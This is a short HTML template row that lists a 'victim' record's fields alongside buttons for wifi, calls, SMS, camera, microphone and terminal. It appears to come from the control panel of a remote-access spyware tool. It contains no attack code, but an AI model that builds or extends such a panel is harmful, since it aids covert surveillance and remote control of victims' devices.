<tr>
    <td>{{ victim[0] }}</td>
    <td>{{ victim[1] }}</td>
    <td>{{ victim[2] }}</td>
    <td>{{ victim[3] }}</td>
    <td>{{ victim[4] }}</td>
    <td>{{ victim[5] }}</td>
    <td>{{ victim[6] }}</td>
    <td class="text-end">
        <button class="btn btn-outline-danger btn-rounded"><i class="fas fa-wifi"></i></button>
        <button class="btn btn-outline-success btn-rounded"><i class="fas fa-phone"></i></button>
        <button class="btn btn-outline-primary btn-rounded"><i class="fas fa-sms"></i></button>
        <button class="btn btn-outline-secondary btn-rounded"><i class="fas fa-camera"></i></button>
        <button class="btn btn-outline-info btn-rounded"><i class="fas fa-microphone"></i></button>
        <button class="btn btn-outline-dark btn-rounded"><i class="fas fa-terminal"></i></button>
    </td>
</tr>    